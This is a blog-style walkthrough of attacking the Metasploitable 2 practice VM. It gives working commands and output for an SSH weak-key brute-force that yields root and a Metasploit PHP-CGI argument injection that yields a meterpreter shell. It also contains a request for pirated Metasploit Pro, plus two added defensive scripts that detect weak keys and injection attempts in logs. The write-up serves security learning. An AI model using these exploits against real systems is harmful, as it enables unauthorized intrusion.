metasploitable 2 c4rp3nt3r test notes
Metasploit recently released Metasploitable 2, a Linux OS built for practice. It runs Ubuntu 8.04 loaded with all kinds of vulnerabilities, which perfectly satisfies the ever-growing need of us broke nerds to show off and daydream.
Download: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploit's official user guide is at https://community.rapid7.com/docs/DOC-1875
Ignorant me had never played with anything this fancy before, so I downloaded it and gave it a try.
I grabbed nmap and Nessus, scanned like crazy, and found tons of services with tons of high-risk vulnerabilities.
![nessus scan report](http://www.0x50sec.org/wp-content/uploads/2012/06/nessus-all.png)
Metasploitable is like a set of practice problems: when you do exercises you should of course pick the ones you are weak at, otherwise there is no point. The many one-shot vulnerabilities and backdoors are not very interesting; what we care about is the stuff whose outcome we are not sure of. First, let's look at the vulnerability found on port 22.
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166
![nessus-ssh-vuln](http://www.0x50sec.org/wp-content/uploads/2012/06/nessus-22.png)
Since it is Metasploitable, let's have Metasploit step up.
Search for an exploit:
```
msf > search cve:2008-0166
msf >
```
Damn, there really is none. I guess Metasploit Pro has this exploit, but broke nerds can't afford that; if anyone has a cracked copy, seriously, hook me up.
Crap, broke nerds have to go search exploit-db instead. For a local search, do an svn update first.
```
root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
```
Pick the Python exploit and open it up; you will find the considerate usage notes in its header:
```
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
# 2. Extract it to a directory
# 3. Execute the python script
#    - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#    - execute: python exploit.py (without parameters) to display the help
#    - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#         Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
```
OK, let's go.
```
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
root@bt:~/Desktop# python 5720.py
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
  <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
  <host>: The victim host
  <user>: The user of the victim host
  [port]: The SSH port of the victim host (default 22)
  [threads]: Number of threads (default 4) Too big numer is bad
root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root
```
After waiting until the flowers had wilted, it succeeded.
![exploit-ssh-success](http://www.0x50sec.org/wp-content/uploads/2012/06/exploit-ssh-success.png)
Let's try it right away.
```
root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103
Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

To access official Ubuntu documentation, please visit:

root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
```
![ssh-login-success](http://www.0x50sec.org/wp-content/uploads/2012/06/ssh-login.png)
Holy crap, it really logged in. That was way too easy.
Let's keep looking, but we will skip the exploitation methods other people have already published.
Let's see what is on the menu in the web directory. There is a vulnerable phpMyAdmin, a wiki application, and Mutillidae and DVWA, which exist specifically for practicing web vulnerabilities.
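The reason this "brute force" works is that the broken Debian PRNG could only produce a small, enumerable set of keys, so a defender can do the reverse: compute the fingerprint of every installed or authorized public key and look it up in the list of known weak keys (Debian shipped those fingerprints in the openssh-blacklist package, which ssh-vulnkey consulted). The following Python script is an added example, not part of this post nor of the WarCat exploit: it parses an OpenSSH public key line, computes the legacy MD5 and the modern SHA-256 fingerprints, and checks the MD5 one against a blacklist set. The sample key, its comment and the blacklist set are constructed here; the shipped blacklist files store the fingerprints in a trimmed form, so plugging the real lists in takes a small adaptation.

```python
import base64
import hashlib
import struct


def _read_string(buf, offset):
    """Read one SSH wire-format string: uint32 big-endian length, then that many bytes."""
    (length,) = struct.unpack(">I", buf[offset:offset + 4])
    start = offset + 4
    return buf[start:start + length], start + length


def _mpint(value):
    """Encode a non-negative integer as an SSH mpint (leading 0x00 when the high bit is set)."""
    raw = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return struct.pack(">I", len(raw)) + raw


def build_rsa_blob(e, n):
    """Build an ssh-rsa public key blob from (e, n); used here only to construct sample input."""
    ktype = b"ssh-rsa"
    return struct.pack(">I", len(ktype)) + ktype + _mpint(e) + _mpint(n)


def pubkey_line_from_rsa(e, n, comment="constructed"):
    """Produce an id_rsa.pub / authorized_keys style line for a constructed key."""
    return "ssh-rsa " + base64.b64encode(build_rsa_blob(e, n)).decode() + " " + comment


def parse_pubkey_line(line):
    """Parse '<type> <base64 blob> [comment]' and return type, modulus size and raw blob."""
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("malformed public key line")
    blob = base64.b64decode(fields[1])
    ktype, off = _read_string(blob, 0)
    if ktype.decode() != fields[0]:
        raise ValueError("key type inside the blob does not match the type field")
    if ktype != b"ssh-rsa":
        raise ValueError("only ssh-rsa keys are handled in this example")
    _exponent, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    modulus = int.from_bytes(n_bytes, "big")
    return {"type": ktype.decode(), "bits": modulus.bit_length(), "blob": blob}


def fingerprint_md5(blob):
    """Legacy OpenSSH fingerprint: MD5 over the raw blob, as 32 hex characters."""
    return hashlib.md5(blob).hexdigest()


def fingerprint_sha256(blob):
    """Modern OpenSSH fingerprint: unpadded base64 of SHA-256 over the raw blob."""
    return base64.b64encode(hashlib.sha256(blob).digest()).rstrip(b"=").decode()


def check_key_line(line, weak_md5_fingerprints):
    """Return 'weak' when the key's MD5 fingerprint is in the blacklist, otherwise 'ok'."""
    key = parse_pubkey_line(line)
    return "weak" if fingerprint_md5(key["blob"]) in weak_md5_fingerprints else "ok"


if __name__ == "__main__":
    # Constructed sample key (not a real generated key): e = 65537, a 2048-bit odd n.
    sample_line = pubkey_line_from_rsa(65537, (1 << 2047) | 1, "test@lab")
    key = parse_pubkey_line(sample_line)
    # Constructed stand-in for the real blacklist: pretend this one key is known weak.
    weak = {fingerprint_md5(key["blob"])}
    print(key["type"], key["bits"], "SHA256:" + fingerprint_sha256(key["blob"]))
    print("verdict:", check_key_line(sample_line, weak))
```

Run it over every line of `~/.ssh/authorized_keys` and every `*.pub` under /etc/ssh on a host; any key that comes back `weak` should be replaced, because the matching private key is in a public archive just like the one this post downloaded.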
![metasploitable-index-page](http://www.0x50sec.org/wp-content/uploads/2012/06/index.png)
The practice apps are too simple, so we won't play with them; TWiki isn't much fun either; Nessus already found the MySQL password earlier, and the web apps aren't fun. Let's scan the directories and see what's there.
I grabbed a lightweight Perl scanner and did a quick scan first. The result:
```
++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++
```
Let's look at phpinfo.php. Some international *** said there is nothing there besides phpinfo.php, but actually a single phpinfo.php is sometimes enough to get a shell.
It showed PHP running in CGI mode, so I visited:
![php-cgi-arg-injection-vuln](http://www.0x50sec.org/wp-content/uploads/2012/06/php-cgi-vul.png)
Damn, isn't that the famous one, the PHP CGI Argument Injection vulnerability?
Time to bring Metasploit out again. You are the star here, so put in some effort, will you?
```
msf > search cve:2012-1823

Name                                       Disclosure Date  Rank       Description
----                                       ---------------  ----       -----------
exploit/multi/http/php_cgi_arg_injection   2012-05-03       excellent  PHP CGI Argument Injection
```
This time it really has one. OK, Metasploit time.
```
msf exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103
msf exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
TARGETURI => /phpinfo.php
msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_cgi_arg_injection) > exploit

[*] Started bind handler
[*] Sending stage (39217 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800

Server username: www-data (33)
```
![exploit-php-cgi-arg-injection](http://www.0x50sec.org/wp-content/uploads/2012/06/exploit-php-cgi-arg-inj.png)
OK, one success with Metasploit. At least the name Metasploitable wasn't wasted.
Afterwards I also tested the web vulnerabilities inside, but they are not interesting, so I won't write them up. When will Chinese folks build a similar system? Load it with domestic CMSes, don't stuff it with so many overflows and weak passwords, and run it as a game or a competition; that would actually be pretty fun.
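From the defender's side, what is worth knowing is how CVE-2012-1823 looks in the web server's access log. Per the CGI spec, Apache passes the query string to the CGI program as command-line arguments only when it contains no literal `=`, and php-cgi before the fix treated an argument starting with `-` as one of its own options. The following Python script is an added example, not part of this post nor of Metasploit: it walks constructed Apache combined-format log lines (the IPs, timestamps and sizes are made up) and flags requests whose query string, after URL decoding, would reach php-cgi as an option.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log lines; not real traffic.
SAMPLE_LOG = """\
192.168.1.100 - - [22/Jun/2012:11:30:01 +0800] "GET /phpinfo.php HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
192.168.1.100 - - [22/Jun/2012:11:30:05 +0800] "GET /index.php?page=home HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.168.1.100 - - [22/Jun/2012:11:38:20 +0800] "GET /phpinfo.php?-s HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
192.168.1.100 - - [22/Jun/2012:11:38:21 +0800] "POST /phpinfo.php?%2Ds HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
192.168.1.100 - - [22/Jun/2012:11:40:00 +0800] "GET /index.php?-x=1 HTTP/1.1" 404 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def query_reaches_argv(target):
    """Return the decoded query string if a CGI server would hand it to php-cgi as argv, else None.

    Apache (following RFC 3875) only turns the query string into command-line arguments when
    it contains no literal '='; an encoded %3D does not count, which is why decoding comes after
    the check rather than before it.
    """
    if "?" not in target:
        return None
    query = target.split("?", 1)[1]
    if "=" in query:
        return None
    return unquote_plus(query)


def is_cgi_option_injection(target):
    """CVE-2012-1823 pattern: an argv-bound query string that starts with '-' is parsed as a php-cgi option."""
    decoded = query_reaches_argv(target)
    return decoded is not None and decoded.lstrip().startswith("-")


def scan_log(text):
    """Return (ip, timestamp, request target) for every line that matches the injection pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if is_cgi_option_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} php-cgi option injection attempt: {target}")
```

Note the two non-hits: `?page=home` and `?-x=1` both carry a literal `=`, so Apache puts them in QUERY_STRING rather than argv and php-cgi never sees them as options. The fix itself is to run a PHP release with the patch (5.3.12 / 5.4.2 or later) or not to serve PHP through the CGI binary at all; the log check is for finding attempts against hosts like this one after the fact.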